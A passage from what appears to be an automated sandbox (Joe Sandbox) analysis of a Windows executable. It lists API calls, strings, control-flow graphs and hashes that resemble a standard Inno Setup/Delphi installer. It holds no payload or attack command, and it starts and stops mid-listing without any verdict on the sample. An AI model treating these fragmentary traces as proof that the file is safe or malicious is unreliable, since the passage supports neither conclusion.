• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
• DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
• String ID:
• API String ID: 183575631-0
• Opcode ID: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
• Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
• Opcode Fuzzy Hash: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
• Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D

Control-flow Graph
control_flow_graph 2646 4674ec-467596 call 41462c call 41464c call 41462c call 41464c SHGetFileInfo 2655 4675cb-4675d6 call 478d20 2646->2655 2656 467598-46759f 2646->2656 2661 467627-46763a call 47cff4 2655->2661 2662 4675d8-46761d call 42c40c call 40357c call 403738 ExtractIconA call 46742c 2655->2662 2656->2655 2658 4675a1-4675c6 ExtractIconA call 46742c 2656->2658 2658->2655 2668 46763c-467646 call 47cff4 2661->2668 2669 46764b-46764f 2661->2669 2684 467622 2662->2684 2668->2669 2671 467651-467674 call 403738 SHGetFileInfo 2669->2671 2672 4676a9-4676dd call 403400 * 2 2669->2672 2671->2672 2680 467676-46767d 2671->2680 2680->2672 2683 46767f-4676a4 ExtractIconA call 46742c 2680->2683 2683->2672 2684->2672
APIs
• SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
  • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
  • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
• ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
• SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
• ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: Icon$Extract$FileInfo$CursorDestroyDraw
• String ID: c:\directory$k H$shell32.dll
• API String ID: 3376378930-433663191
• Opcode ID: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
• Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
• Opcode Fuzzy Hash: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
• Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59

Control-flow Graph
control_flow_graph 2688 42f570-42f57a 2689 42f584-42f5c1 call 402b30 GetActiveWindow GetFocus call 41eeb4 2688->2689 2690 42f57c-42f57f call 402d30 2688->2690 2696 42f5d3-42f5db 2689->2696 2697 42f5c3-42f5cd RegisterClassA 2689->2697 2690->2689 2698 42f662-42f67e SetFocus call 403400 2696->2698 2699 42f5e1-42f612 CreateWindowExA 2696->2699 2697->2696 2699->2698 2701 42f614-42f658 call 42428c call 403738 CreateWindowExA 2699->2701 2701->2698 2707 42f65a-42f65d ShowWindow 2701->2707 2707->2698
APIs
• GetActiveWindow.USER32 ref: 0042F59F
• GetFocus.USER32 ref: 0042F5A7
• RegisterClassA.USER32(004997AC), ref: 0042F5C8
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
• CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
• ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
• SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: Window$CreateFocus$ActiveClassRegisterShow
• String ID: TWindowDisabler-Window
• API String ID: 3167913817-1824977358
• Opcode ID: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
• Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
• Opcode Fuzzy Hash: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
• Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
• Opcode ID: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
• Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
• Opcode Fuzzy Hash: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
• Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD

APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
• GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
• API String ID: 1375471231-1421604804
• Opcode ID: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
• Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
• Opcode Fuzzy Hash: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
• Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69

                                                                                                      APIs
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                                                                      Strings
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505
• Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
• Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
• Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
• Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
• FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
• FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
• FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
Strings
Similarity
• API ID: Find$CloseFileNext
• String ID: "*G$"*G
• API String ID: 2066263336-450946878
• Opcode ID: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
• Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
• Opcode Fuzzy Hash: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
• Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
  • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
  • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
  • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
  • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
Strings
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
• Opcode ID: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
• Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
• Opcode Fuzzy Hash: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
• Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
• OemToCharA.USER32(?,?), ref: 0042376C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
Strings
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
• Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
• Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
• Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
• Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
• GetCurrentThreadId.KERNEL32 ref: 00418F89
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
  • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
  • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
  • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
  • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
  • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
  • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
  • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
  • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
  • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
  • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
Strings
Similarity
• API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
• String ID: ControlOfs%.8X%.8X$Delphi%.8X
• API String ID: 3476490787-2767913252
• Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
• Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
• Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
• Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
• GetWindowLongA.USER32(?,000000F0), ref: 0041367F
• GetWindowLongA.USER32(?,000000F4), ref: 00413691
• SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
• SetPropA.USER32(?,00000000,00000000), ref: 004136BB
• SetPropA.USER32(?,00000000,00000000), ref: 004136D2
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
• Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
• Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
• Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
• Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
Strings
• PendingFileRenameOperations, xrefs: 00455740
• WININIT.INI, xrefs: 004557D0
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
• PendingFileRenameOperations2, xrefs: 00455770
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                      • API String ID: 47109696-2199428270
                                                                                                      • Opcode ID: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                                      • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                                                                      • Opcode Fuzzy Hash: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                                      • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
APIs
• EnumWindows.USER32(00423A2C), ref: 00423AB8
• GetWindow.USER32(?,00000003), ref: 00423ACD
• GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
• SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: Window$EnumLongWindows
• String ID: lAB
• API String ID: 4191631535-3476862382
• Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
• Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
• Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
• Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
• Opcode ID: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
• Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
• Opcode Fuzzy Hash: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
• Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
Strings
• NextButtonClick, xrefs: 0046BF84
• Need to restart Windows? %s, xrefs: 0046C172
• PrepareToInstall failed: %s, xrefs: 0046C14B
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID:
• String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
• API String ID: 0-2329492092
• Opcode ID: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
• Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
• Opcode Fuzzy Hash: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
• Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
APIs
• SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
• SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ActiveChangeNotifyWindow
• String ID: $Need to restart Windows? %s
• API String ID: 1160245247-4200181552
• Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
• Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
• Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
• Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
APIs
  • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
• GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ChangeNotify$ErrorFullLastNamePath
• String ID: Creating directory: %s
• API String ID: 2451617938-483064649
• Opcode ID: 1f02ae1e850569658feceaaf3c85ff1782ed1f35d471b3de261e4d8f3d8ed172
• Instruction ID: bdf8a9d00633064e3922ce557b3b2562df44373322d6b4000fae74d311730630
